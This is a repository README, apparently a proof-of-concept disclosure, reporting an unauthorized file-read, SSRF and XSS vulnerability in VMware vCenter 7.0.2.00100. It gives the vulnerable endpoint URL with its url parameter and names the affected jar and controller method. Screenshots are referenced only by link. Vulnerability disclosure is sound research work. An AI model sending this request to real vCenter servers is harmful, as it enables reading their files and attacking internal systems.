[
  {
    "path": "README.md",
    "content": "# VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability\n## POC\nhttps://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}\n\nFile read:\n\n![](./file_read.PNG)\n\n\nSSRF + XSS:\n\n![](./xss.PNG)\n\n## vulnerable code:\n/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar\n\ncom.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()\n\n![](./code.PNG)\n\nTested on vCenter 7.0.2.00100, not knowing the exact affected version range or cve id\n"
  }
]